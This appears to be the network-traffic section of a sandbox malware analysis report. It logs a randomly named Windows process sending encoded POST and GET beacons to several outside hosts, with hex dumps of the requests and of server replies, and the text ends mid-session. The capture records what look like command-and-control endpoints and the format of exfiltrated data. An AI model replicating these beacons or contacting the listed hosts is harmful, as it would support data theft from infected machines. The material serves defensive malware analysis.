                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 4c 46 33 57 6f 41 48 74 32 63 70 69 46 58 61 6e 74 77 6a 6d 6e 39 47 4a 44 32 37 2b 66 50 45 67 56 4f 57 51 43 30 61 42 52 55 42 38 33 6a 70 78 44 38 44 39 63 4e 63 45 71 6f 62 2f 51 4e 68 38 37 2f 53 49 67 49 74 31 4a 33 78 48 76 35 4c 35 6d 71 39 69 66 36 34 4a 36 65 70 38 52 7a 74 68 58 42 73 54 70 64 6f 71 49 32 4e 45 6a 68 44 77 74 68 58 35 38 6b 6c 63 4e 4e 2b 48 32 35 32 41 53 77 66 78 71 5a 45 76 73 69 4e 76 7a 32 58 4e 49 53 48 69 67 48 71 43 56 54 70 2f 33 32 68 7a 6b 50 35 41 52 6e 57 58 75 78 33 43 66 61 6c 38 71 57
                                                                                          Data Ascii: gHCXmDU=1AbqsGSWvjVHP6cEPBfdZjZ4M17B62jDv0PzJ36RtALF3WoAHt2cpiFXantwjmn9GJD27+fPEgVOWQC0aBRUB83jpxD8D9cNcEqob/QNh87/SIgIt1J3xHv5L5mq9if64J6ep8RzthXBsTpdoqI2NEjhDwthX58klcNN+H252ASwfxqZEvsiNvz2XNISHigHqCVTp/32hzkP5ARnWXux3Cfal8qW


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          7 | 192.168.2.5 | 49719 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:45:04.614773035 CEST | 1852 | OUT | POST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 44 46 33 45 67 41 46 4f 75 63 6f 69 46 58 46 58 74 31 6a 6d 6e 61 47 4a 62 71 37 2b 43 30 45 69 64 4f 58 31 4f 30 63 77 52 55 4f 38 33 6a 30 68 44 35 65 4e 64 5a 63 45 37 6a 62 2f 41 4e 68 38 37 2f 53 4e 6b 49 71 67 31 33 7a 48 76 6d 64 70 6d 2b 35 69 66 65 34 4a 69 6f 70 2f 39 4a 34 42 33 42 70 44 35 64 75 5a 67 32 46 45 6a 2f 54 67 73 38 58 35 34 37 6c 63 52 72 2b 48 44 69 32 48 6d 77 63 6b 72 47 58 4f 67 2b 4f 63 54 53 48 4e 35 75 61 30 35 6b 6a 53 55 6b 6c 49 58 76 69 78 38 4d 33 55 52 64 61 31 76 4a 32 45 4b 4e 73 34 37 62 4e 6f 70 74 78 34 2f 55 78 7a 2f 78 69 68 4a 30 72 67 71 38 4f 70 77 79 52 36 6f 52 42 39 70 73 65 58 47 78 51 34 79 30 38 78 6b 46 6e 2f 68 68 6c 65 44 7a 37 79 72 67 77 77 63 6b 6c 35 48 72 37 34 6b 6a 68 6e 77 46 75 33 4e 2f 70 43 4b 61 2f 68 73 33 4e 70 30 78 64 79 70 6b 53 36 30 67 76 6c 66 53 38 30 70 6e 30 35 36 54 56 75 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU= [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          8 | 192.168.2.5 | 49720 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:45:07.160469055 CEST | 547 | OUT | GET /0fox/?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.weatherbook.live
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:45:08.252270937 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 39 3d 67 38 75 38 26 67 48 43 58 6d 44 55 3d 34 43 7a 4b 76 79 69 6b 6c 31 4a 6d 47 72 38 2b 43 51 66 39 57 57 41 64 4f 31 47 6a 36 6c 57 4e 6d 44 50 55 42 48 75 64 73 52 44 58 6d 33 35 65 50 76 57 4a 6b 6e 4e 31 43 6a 39 72 6a 33 4c 47 65 65 65 32 75 63 48 51 44 6a 6b 46 57 56 71 52 57 53 74 77 4a 6f 75 67 73 44 72 6b 46 2b 46 6e 4b 6e 75 67 63 2f 4e 50 35 64 65 43 54 39 35 4d 73 67 68 64 78 48 43 47 66 75 57 41 78 6d 69 58 6a 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA=="}</script></head></html>
                                                                                          Sep 30, 2024 18:45:08.252393961 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 39 3d 67 38 75 38 26 67 48 43 58 6d 44 55 3d 34 43 7a 4b 76 79 69 6b 6c 31 4a 6d 47 72 38 2b 43 51 66 39 57 57 41 64 4f 31 47 6a 36 6c 57 4e 6d 44 50 55 42 48 75 64 73 52 44 58 6d 33 35 65 50 76 57 4a 6b 6e 4e 31 43 6a 39 72 6a 33 4c 47 65 65 65 32 75 63 48 51 44 6a 6b 46 57 56 71 52 57 53 74 77 4a 6f 75 67 73 44 72 6b 46 2b 46 6e 4b 6e 75 67 63 2f 4e 50 35 64 65 43 54 39 35 4d 73 67 68 64 78 48 43 47 66 75 57 41 78 6d 69 58 6a 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA=="}</script></head></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          9 | 192.168.2.5 | 49721 | 188.114.96.3 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:45:14.011528969 CEST | 794 | OUT | POST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 45 31 76 64 56 67 76 48 65 54 66 4d 68 53 4f 54 42 46 2f 6a 56 36 78 58 73 6d 64 57 58 30 7a 56 43 4e 66 48 4a 69 4f 65 57 73 4f 49 57 43 69 58 41 4a 37 79 66 74 4f 67 65 70 36 6d 37 59 71 69 43 71 4b 55 47 71 58 33 71 65 4a 69 35 69 49 6c 42 38 4a 2b 46 44 55 4f 54 46 7a 68 53 66 7a 35 74 4c 43 78 79 2b 33 49 63 6b 7a 44 34 39 75 67 78 78 69 65 41 73 6b 65 4e 46 46 31 53 70 45 7a 35 58 67 74 45 65 72 79 75 44 33 34 43 69 31 47 34 4f 37 72 53 39 31 69 4c 64 6b 31 44 31 67 79 58 6e 35 44 38 69 55 70 37 46 6b 70 50 75 7a 52 59 58 69 61 41 69 63 67 37 2f 77 3d
                                                                                          Data Ascii: gHCXmDU=GFLjA1VE9EryE1vdVgvHeTfMhSOTBF/jV6xXsmdWX0zVCNfHJiOeWsOIWCiXAJ7yftOgep6m7YqiCqKUGqX3qeJi5iIlB8J+FDUOTFzhSfz5tLCxy+3IckzD49ugxxieAskeNFF1SpEz5XgtEeryuD34Ci1G4O7rS91iLdk1D1gyXn5D8iUp7FkpPuzRYXiaAicg7/w=
Sep 30, 2024 18:45:16.318583965 CEST | 690 | IN | HTTP/1.1 405 Not Allowed
                                                                                          Date: Mon, 30 Sep 2024 16:45:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aMxMBIN5eM1IQKmyDGiikIFEKp9PjhRlcFRMHx8UCRuT2W45rY1t4fl%2FylM1NBhvEKnIUQDIHwUhE40YGvf3RzoEI%2Bw1CdJF1YkTcloBr90gHbMTnVBlFHaODHZh8FZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aea5296f7cae-EWR
                                                                                          Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
Sep 30, 2024 18:45:16.320951939 CEST | 690 | IN | HTTP/1.1 405 Not Allowed
                                                                                          Date: Mon, 30 Sep 2024 16:45:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aMxMBIN5eM1IQKmyDGiikIFEKp9PjhRlcFRMHx8UCRuT2W45rY1t4fl%2FylM1NBhvEKnIUQDIHwUhE40YGvf3RzoEI%2Bw1CdJF1YkTcloBr90gHbMTnVBlFHaODHZh8FZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aea5296f7cae-EWR
                                                                                          Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49722 | 188.114.96.3 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:16.621462107 CEST | 814 | OUT | POST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 6e 56 43 76 48 48 49 67 6d 65 52 73 4f 49 5a 69 69 65 50 70 37 73 66 74 43 47 65 6f 57 6d 37 59 2b 69 43 76 75 55 47 5a 76 6f 72 4f 4a 38 32 43 49 6e 4c 63 4a 2b 46 44 55 4f 54 45 44 59 53 66 37 35 74 36 79 78 30 64 76 50 44 55 7a 43 2f 39 75 67 31 78 69 61 41 73 6b 6f 4e 48 78 54 53 73 59 7a 35 54 73 74 45 4d 54 78 6b 44 33 2b 4e 43 31 59 2b 76 61 34 56 65 39 77 58 50 77 78 52 46 67 56 62 78 55 70 6d 41 63 42 6f 6c 49 52 66 39 37 6d 4a 6e 44 7a 61 42 4d 51 6c 6f 6c 31 4d 66 4b 6d 53 49 55 59 4a 57 38 45 42 53 56 66 4b 75 61 63
                                                                                          Data Ascii: gHCXmDU=GFLjA1VE9EryFVfdGDHHYzfDuyOTb1/dV6tXsiEJXmnVCvHHIgmeRsOIZiiePp7sftCGeoWm7Y+iCvuUGZvorOJ82CInLcJ+FDUOTEDYSf75t6yx0dvPDUzC/9ug1xiaAskoNHxTSsYz5TstEMTxkD3+NC1Y+va4Ve9wXPwxRFgVbxUpmAcBolIRf97mJnDzaBMQlol1MfKmSIUYJW8EBSVfKuac


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49723 | 188.114.96.3 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:19.166954994 CEST | 1831 | OUT | POST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 2f 56 43 38 50 48 49 47 75 65 51 73 4f 49 55 43 69 62 50 70 36 77 66 74 4b 43 65 6f 4b 59 37 62 47 69 45 4a 69 55 41 73 44 6f 69 4f 4a 38 75 43 49 71 42 38 4a 72 46 46 30 52 54 46 2f 59 53 66 37 35 74 35 61 78 7a 4f 33 50 51 45 7a 44 34 39 76 68 78 78 6a 2f 41 76 56 64 4e 48 31 6c 53 59 55 7a 35 33 41 74 49 66 72 78 35 54 33 38 4b 43 30 4c 2b 76 58 67 56 65 52 38 58 4f 46 63 52 48 67 56 5a 6b 35 4b 33 41 49 68 79 6b 49 58 61 4e 72 38 52 67 2f 6a 54 68 45 71 76 71 46 72 48 72 44 4d 53 2b 73 67 4a 31 31 33 62 32 39 66 43 49 7a 67 32 70 56 6a 41 6f 37 42 4a 75 38 53 49 4d 4e 6b 6c 56 4a 65 6b 32 55 4e 58 66 38 59 59 58 66 45 38 6f 6e 64 34 59 5a 71 79 55 35 37 51 61 5a 34 4e 58 6a 31 4b 43 4e 70 75 52 45 6c 65 4c 38 48 33 75 71 41 6e 65 69 4b 54 65 4b 58 51 72 47 6e 77 69 59 6e 32 62 50 56 66 44 67 43 63 33 62 52 45 74 54 49 68 73 32 51 58 6f 2f 4c 69 67 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49724 | 188.114.96.3 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:22.809087038 CEST | 540 | OUT | GET /9apq/?gHCXmDU=LHjDDAx19xzpDFr0PiWSUWbLpibiWm2OcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3kbNhxDE+C6RgPFZIWir2F/mXh+rIzbzvAjzVwKDU5y7xZw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.cc101.pro
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Sep 30, 2024 18:45:24.969702959 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                          Date: Mon, 30 Sep 2024 16:45:24 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Last-Modified: Fri, 27 Sep 2024 08:35:58 GMT
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbcmGyNdv6GPfTxv7r8YhlQqnTFCW0oKkcqWzylUAZRb0NbdX71PPNZ0klWtkRY1WJ1gSF8tzYGxqplUMxje1nWiGOraTfpYAEHnX2WLm6WngHiN2CxDgqVUU162XQ7c"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aedc09741a48-EWR
                                                                                          Data Raw: 64 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                                                          Data Ascii: de0<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></ca
Sep 30, 2024 18:45:24.969793081 CEST | 1236 | IN | Data Raw: 6e 76 61 73 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 31 31 70 78 20 20 30 20 32 30 70 78 22 3e e9 80 9a e8 bf 87 e5 ae 89 e5
                                                                                          Data Ascii: nvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</div><a id
Sep 30, 2024 18:45:24.969829082 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 64 31 64 32 64 34 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 61 72 63 28 30 2c 20 30 2c 20 72 61 73 20 2a 20 30 2e 38 2c 20 30 2c
                                                                                          Data Ascii: ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI * 2, false); ctx.stroke(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12;
Sep 30, 2024 18:45:24.969862938 CEST | 485 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 20 2b 3d 20 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: index += 1 } else { index += 3 } setTimeout(drawFrame, 20) } else if (index != 100) {


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49725 | 31.31.196.17 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:30.107839108 CEST | 806 | OUT | POST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
